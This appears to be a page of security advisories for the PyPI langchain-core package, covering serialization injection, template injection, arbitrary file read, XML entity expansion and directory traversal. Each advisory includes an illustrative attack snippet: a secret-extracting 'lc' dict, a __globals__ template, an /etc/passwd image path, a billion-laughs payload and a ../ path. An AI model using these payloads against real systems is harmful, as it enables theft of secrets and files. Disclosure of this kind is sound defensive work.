Advisories for PyPI/langchain-core package

2025

LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs

A serialization injection vulnerability exists in LangChain's dumps() and dumpd() functions: they do not escape dictionaries that contain an 'lc' key when serializing free-form user data. LangChain uses the 'lc' key internally to mark serialized objects, so when user-controlled data mimics this structure it is treated as a legitimate LangChain object during deserialization rather than as plain user data.
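As a rough sketch of the injection pattern (not a working exploit), the example below assumes the langchain_core.load.dumps/loads APIs and the 'secret' marker shape used by LangChain's serialization envelope; exact behavior depends on the installed version, and the OPENAI_API_KEY name is purely illustrative.

from langchain_core.load import dumps, loads

# Free-form, user-controlled dictionary that mimics LangChain's internal
# serialization envelope by including the reserved 'lc' key.
user_data = {
    "lc": 1,
    "type": "secret",
    "id": ["OPENAI_API_KEY"],  # hypothetical secret name
}

# Affected versions do not escape the 'lc' key, so the payload is emitted
# verbatim instead of being marked as plain user data.
serialized = dumps({"user_input": user_data})

# On deserialization, the payload is then treated as a LangChain "secret"
# marker and resolved from the secrets map (or environment) rather than being
# returned as a plain dict.
restored = loads(serialized, secrets_map={"OPENAI_API_KEY": "sk-..."})
print(restored["user_input"])  # may yield the secret value on affected versions

If the round-tripped data is ever reflected back to the user who supplied it, the substituted secret leaks.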

LangChain Vulnerable to Template Injection via Attribute Access in Prompt Templates

Attackers who can control template strings (not just template variables) can access Python object attributes and internal properties via attribute traversal, extract sensitive information from object internals (e.g., __class__, __globals__), and potentially escalate to more severe attacks depending on the objects passed to templates.
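A minimal sketch of the pattern, assuming the default f-string template format (which delegates to str.format() and therefore permits attribute traversal in replacement fields on unpatched versions); the Config object and template string here are hypothetical:

from langchain_core.prompts import PromptTemplate

class Config:
    def __init__(self):
        self.api_key = "sk-..."  # hypothetical secret held on the object

# Attacker-controlled TEMPLATE STRING (not merely a template variable):
malicious_template = "Summarize: {obj.__class__.__init__.__globals__}"

prompt = PromptTemplate.from_template(malicious_template)

# On unpatched versions, formatting traverses attributes of the object passed
# in, exposing class internals and module globals in the rendered prompt.
print(prompt.format(obj=Config()))

Patched versions reject attribute and index access in template fields, so only plain variable substitution is allowed.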

langchain-core allows unauthorized users to read arbitrary files from the host file system

A vulnerability in langchain-core versions >=0.1.17,<0.1.53, >=0.2.0,<0.2.43, and >=0.3.0,<0.3.15 allows unauthorized users to read arbitrary files from the host file system. The issue arises from the ability to create langchain_core.prompts.ImagePromptTemplate instances (and, by extension, langchain_core.prompts.ChatPromptTemplate instances) with input variables that can read any user-specified path from the server file system. If the outputs of these prompt templates are exposed to the user, either directly or through downstream model outputs, it can lead …
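An illustrative sketch of the unsafe pattern on affected versions; the exact image message schema varies across releases, and the {image_path} variable name is hypothetical:

from langchain_core.prompts import ChatPromptTemplate

# A chat prompt whose image source is filled in from an input variable.
prompt = ChatPromptTemplate.from_messages(
    [
        (
            "user",
            [{"type": "image_url", "image_url": {"path": "{image_path}"}}],
        )
    ]
)

# On affected versions, a caller who controls the variable can point it at a
# local filesystem path; the file is read and inlined (base64-encoded) into
# the formatted message, leaking its contents if the prompt or downstream
# model output is ever shown to the user.
messages = prompt.format_messages(image_path="/etc/passwd")

Patched versions no longer resolve local filesystem paths when formatting image prompts.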

2024

LangChain's XMLOutputParser vulnerable to XML Entity Expansion

The XMLOutputParser in LangChain uses the etree module from the xml package in the Python standard library, which has known XML vulnerabilities; see: https://docs.python.org/3/library/xml.html. This primarily affects users who combine an LLM (or agent) with the XMLOutputParser and expose the component via an endpoint on a web service. This would allow a malicious party to attempt to manipulate the LLM into producing a malicious payload for the parser that would compromise …
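A small illustration of why unhardened etree parsing is risky, using a classic "billion laughs" entity-expansion payload (truncated here to a harmless size); behavior differs between affected and patched releases:

from langchain_core.output_parsers import XMLOutputParser

malicious_llm_output = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>"""

parser = XMLOutputParser()
# Affected versions expand the nested entities (a larger payload exhausts
# memory/CPU); patched versions reject such input via defusedxml instead.
try:
    parser.parse(malicious_llm_output)
except Exception as exc:
    print(type(exc).__name__, exc)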

LangChain directory traversal vulnerability

LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution.
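A conceptual sketch of the traversal; load_chain and the lc:// hub scheme belong to the legacy langchain package, and the attacker-controlled suffix below is hypothetical:

from langchain.chains import load_chain  # legacy langchain package, affected through 0.1.10

# load_chain("lc://chains/<name>/chain.json") is meant to fetch vetted configs
# from the hwchase17/langchain-hub GitHub repository. If an actor controls the
# final part of that path, "../" sequences escape the intended location:
user_suffix = "../../../attacker-owned/ref/chain.json"  # hypothetical attacker-controlled value
chain = load_chain(f"lc://chains/{user_suffix}")
# Loading an attacker-chosen configuration can disclose API keys for an LLM
# service or lead to remote code execution when the chain is constructed.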